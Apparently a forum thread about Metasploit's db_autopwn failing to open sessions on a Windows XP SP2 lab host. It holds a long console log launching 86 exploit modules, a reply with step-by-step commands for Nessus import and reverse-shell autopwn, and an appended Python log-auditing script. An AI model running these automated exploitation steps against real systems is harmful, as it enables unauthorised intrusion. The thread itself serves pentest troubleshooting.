I'm using this program to pentest a clean Windows XP SP2 install, but it doesn't create any sessions. When I exploit it by hand everything works, but with this tool nothing does.

    msf > db_driver
    [*] Active Driver: sqlite3
    [*] Available: sqlite3
    [*] DB Support: Enable the mysql driver with the following command:
    [*] $ gem install mysql
    [*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
    [*] $ sudo apt-get install libmysqlclient-dev
    [*] DB Support: Enable the postgresql driver with the following command:
    [*] $ gem install postgres-pr
    msf > db_create client
    [*] The specified database already exists, connecting
    [*] Successfully connected to the database
    [*] File: client
    msf > db_nmap 192.168.1.5
    Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-31 20:17 MSD
    Interesting ports on 192.168.1.5:
    Not shown: 996 closed ports
    PORT     STATE SERVICE
    135/tcp  open  msrpc
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    2869/tcp open  unknown
    Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
    msf > db_autopwn -p -t -e
    [*] Analysis completed in 6 seconds (0 vulns / 0 refs)
    [*]
    [*] ================================================================================
    [*] Matching Exploit Modules
    [*] ================================================================================
    [*] 192.168.1.5:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
    [*] 192.168.1.5:139 exploit/linux/samba/lsa_transnames_heap (port match)
    [*] 192.168.1.5:139 exploit/multi/samba/nttrans (port match)
    [*] 192.168.1.5:139 exploit/multi/samba/usermap_script (port match)
    [*] 192.168.1.5:139 exploit/netware/smb/lsass_cifs (port match)
    [*] 192.168.1.5:139 exploit/osx/samba/lsa_transnames_heap (port match)
    [*] 192.168.1.5:139 exploit/solaris/samba/trans2open (port match)
    [*] 192.168.1.5:139 exploit/windows/brightstor/ca_arcserve_342 (port match)
    [*] 192.168.1.5:139 exploit/windows/brightstor/etrust_itm_alert (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/ms03_049_netapi (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/ms04_011_lsass (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/ms04_031_netdde (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/ms05_039_pnp (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/ms06_040_netapi (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/ms06_066_nwapi (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/ms06_066_nwwks (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/ms06_070_wkssvc (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/ms08_067_netapi (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/msdns_zonename (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/psexec (port match)
    [*] 192.168.1.5:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
    [*] 192.168.1.5:445 exploit/linux/samba/lsa_transnames_heap (port match)
    [*] 192.168.1.5:445 exploit/multi/samba/nttrans (port match)
    [*] 192.168.1.5:445 exploit/multi/samba/usermap_script (port match)
    [*] 192.168.1.5:445 exploit/netware/smb/lsass_cifs (port match)
    [*] 192.168.1.5:445 exploit/osx/samba/lsa_transnames_heap (port match)
    [*] 192.168.1.5:445 exploit/solaris/samba/trans2open (port match)
    [*] 192.168.1.5:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
    [*] 192.168.1.5:445 exploit/windows/brightstor/etrust_itm_alert (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/ms03_049_netapi (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/ms04_011_lsass (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/ms04_031_netdde (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/ms05_039_pnp (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/ms06_040_netapi (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/ms06_066_nwapi (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/ms06_066_nwwks (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/ms06_070_wkssvc (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/ms08_067_netapi (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/msdns_zonename (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/psexec (port match)
    [*] 192.168.1.5:445 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
    [*] 192.168.1.6:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
    [*] 192.168.1.6:139 exploit/linux/samba/lsa_transnames_heap (port match)
    [*] 192.168.1.6:139 exploit/multi/samba/nttrans (port match)
    [*] 192.168.1.6:139 exploit/multi/samba/usermap_script (port match)
    [*] 192.168.1.6:139 exploit/netware/smb/lsass_cifs (port match)
    [*] 192.168.1.6:139 exploit/osx/samba/lsa_transnames_heap (port match)
    [*] 192.168.1.6:139 exploit/solaris/samba/trans2open (port match)
    [*] 192.168.1.6:139 exploit/windows/brightstor/ca_arcserve_342 (port match)
    [*] 192.168.1.6:139 exploit/windows/brightstor/etrust_itm_alert (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/ms03_049_netapi (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/ms04_011_lsass (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/ms04_031_netdde (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/ms05_039_pnp (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/ms06_040_netapi (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/ms06_066_nwapi (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/ms06_066_nwwks (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/ms06_070_wkssvc (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/ms08_067_netapi (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/msdns_zonename (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/psexec (port match)
    [*] 192.168.1.6:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
    [*] 192.168.1.6:445 exploit/linux/samba/lsa_transnames_heap (port match)
    [*] 192.168.1.6:445 exploit/multi/samba/nttrans (port match)
    [*] 192.168.1.6:445 exploit/multi/samba/usermap_script (port match)
    [*] 192.168.1.6:445 exploit/netware/smb/lsass_cifs (port match)
    [*] 192.168.1.6:445 exploit/osx/samba/lsa_transnames_heap (port match)
    [*] 192.168.1.6:445 exploit/solaris/samba/trans2open (port match)
    [*] 192.168.1.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
    [*] 192.168.1.6:445 exploit/windows/brightstor/etrust_itm_alert (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/ms03_049_netapi (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/ms04_011_lsass (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/ms04_031_netdde (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/ms05_039_pnp (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/ms06_040_netapi (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/ms06_066_nwapi (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/ms06_066_nwwks (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/ms06_070_wkssvc (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/ms08_067_netapi (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/msdns_zonename (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/psexec (port match)
    [*] 192.168.1.6:445 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
    [*] ================================================================================
    [*]
    [*]
    [*] (1/86 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.5:135...
    [*] (2/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.5:139...
    [*] (3/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.5:139...
    [*] (4/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.5:139...
    [*] (5/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.5:139...
    [*] (6/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.5:139...
    [*] (7/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.5:139...
    [*] (8/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.5:139...
    [*] (9/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.5:139...
    [*] (10/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.5:139...
    [*] (11/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.5:139...
    [*] (12/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.5:139...
    [*] (13/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.5:139...
    [*] (14/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.5:139...
    [*] (15/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.5:139...
    [*] (16/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.5:139...
    [*] (17/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.5:139...
    [*] (18/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.5:139...
    [*] (19/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.5:139...
    [*] (20/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.5:139...
    [*] (21/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.5:139...
    [*] (22/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.5:139...
    [*] (23/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.5:445...
    [*] (24/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.5:445...
    [*] (25/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.5:445...
    [*] (26/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.5:445...
    [*] (27/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.5:445...
    [*] (28/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.5:445...
    [*] (29/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.5:445...
    [*] (30/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.5:445...
    [*] (31/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.5:445...
    [*] (32/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.5:445...
    [*] (33/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.5:445...
    [*] (34/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.5:445...
    [*] (35/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.5:445...
    [*] (36/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.5:445...
    [*] (37/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.5:445...
    [*] (38/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.5:445...
    [*] (39/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.5:445...
    [*] (40/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.5:445...
    [*] (41/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.5:445...
    [*] (42/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.5:445...
    [*] (43/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.5:445...
    [*] (44/86 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.6:135...
    [*] (45/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.6:139...
    [*] (46/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.6:139...
    [*] (47/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.6:139...
    [*] (48/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.6:139...
    [*] (49/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.6:139...
    [*] (50/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.6:139...
    [*] (51/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.6:139...
    [*] (52/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.6:139...
    [*] (53/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.6:139...
    [*] (54/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.6:139...
    [*] (55/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.6:139...
    [*] (56/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.6:139...
    [*] (57/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.6:139...
    [*] (58/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.6:139...
    [*] (59/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.6:139...
    [*] (60/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.6:139...
    [*] (61/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.6:139...
    [*] (62/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.6:139...
    [*] (63/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.6:139...
    [*] (64/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.6:139...
    [*] (65/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.6:139...
    [*] (66/86 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.6:445...
    [*] (67/86 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.6:445...
    [*] (68/86 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.6:445...
    [*] (69/86 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.6:445...
    [*] (70/86 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.6:445...
    [*] (71/86 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.6:445...
    [*] (72/86 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.6:445...
    [*] (73/86 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.6:445...
    [*] (74/86 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.6:445...
    [*] (75/86 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.6:445...
    [*] (76/86 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.6:445...
    [*] (77/86 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.6:445...
    [*] (78/86 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.6:445...
    [*] (79/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.6:445...
    [*] (80/86 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.6:445...
    [*] (81/86 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.6:445...
    [*] (82/86 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.6:445...
    [*] (83/86 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.6:445...
    [*] (84/86 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.6:445...
    [*] (85/86 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.6:445...
    [*] (86/86 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.6:445...
    [*] (86/86 [0 sessions]): Waiting on 26 launched modules to finish execution...
    [*] (86/86 [0 sessions]): Waiting on 1 launched modules to finish execution...
    [*] (86/86 [0 sessions]): Waiting on 1 launched modules to finish execution...
    [*] (86/86 [0 sessions]): Waiting on 0 launched modules to finish execution...
    [*] The autopwn command has completed with 0 sessions

P.S. Sorry if anything is off, I don't know how to add a spoiler. A request to the moderator: please format the message so it looks normal, because I don't know my way around HTML :(
Try this: load up nessus, scan your IP, then download the report in .nessus format.
Create a database in Metasploit: db_create
Then load the plugin: load db_tracker
Load the .nessus report itself (after dropping it into the /home/*USER*/ folder): db_import_nessus_xml /home/*USER*/1.nessus
Check for extraneous hosts: db_hosts
If there are extraneous hosts, delete them (example: db_del_host 127.0.0.1)
Check the ports (more precisely, whether the report loaded correctly): db_services
Check the vulnerabilities: db_vulns
Once you've checked everything, run: db_autopwn -p -e (using -t is not required, it just prints the list of all vulnerabilities for the report's ports)
Also try using reverse_tcp: db_autopwn -p -e -r or -b
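
An added example (not part of either post and not Metasploit code): a Python check over a db_autopwn transcript. It reports what the reply's db_hosts and db_vulns steps are meant to catch: hosts in the match list that were never scanned in the transcript, and modules selected by port alone or for a different platform. The log excerpt is constructed in the thread's output format; the function name, result keys and the choice of `windows`/`multi` as acceptable platforms are assumptions.

```python
import re
from collections import defaultdict

# Constructed excerpt in the format of the db_autopwn output quoted in the thread.
SAMPLE_LOG = """\
msf > db_nmap 192.168.1.5
msf > db_autopwn -p -t -e
[*] Analysis completed in 6 seconds (0 vulns / 0 refs)
[*] 192.168.1.5:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
[*] 192.168.1.5:445 exploit/linux/samba/lsa_transnames_heap (port match)
[*] 192.168.1.5:445 exploit/solaris/samba/trans2open (port match)
[*] 192.168.1.5:445 exploit/windows/smb/ms08_067_netapi (port match)
[*] 192.168.1.6:445 exploit/windows/smb/ms08_067_netapi (port match)
[*] 192.168.1.6:445 exploit/multi/samba/usermap_script (port match)
"""

# "[*] <ip>:<port> exploit/<platform>/... (<match basis>)"
MATCH_RE = re.compile(
    r"\[\*\]\s+(\d+\.\d+\.\d+\.\d+):(\d+)\s+exploit/(\w+)/\S+\s+\((.+?)\)")
SCAN_RE = re.compile(r"msf > db_nmap\s+(\S+)")   # assumes a single target argument
VULNS_RE = re.compile(r"\((\d+) vulns / (\d+) refs\)")


def audit_autopwn_plan(log, target_platforms=("windows", "multi")):
    """Summarise which hosts and module platforms a db_autopwn match list covers."""
    scanned = set(SCAN_RE.findall(log))
    vulns = VULNS_RE.search(log)
    per_host = defaultdict(int)
    basis = defaultdict(int)
    wrong_platform = []
    for host, port, platform, reason in MATCH_RE.findall(log):
        per_host[host] += 1
        basis[reason] += 1
        if platform not in target_platforms:      # assumption: target is Windows
            wrong_platform.append((host, int(port), platform))
    return {
        "vulns_in_db": int(vulns.group(1)) if vulns else None,
        "matches_per_host": dict(per_host),
        "hosts_not_scanned": sorted(set(per_host) - scanned),
        "wrong_platform": wrong_platform,
        "match_basis": dict(basis),
    }


if __name__ == "__main__":
    for key, value in audit_autopwn_plan(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

A non-empty `hosts_not_scanned` list means the database still holds hosts from an earlier session, which is the case the reply's db_hosts / db_del_host step addresses before anything is launched.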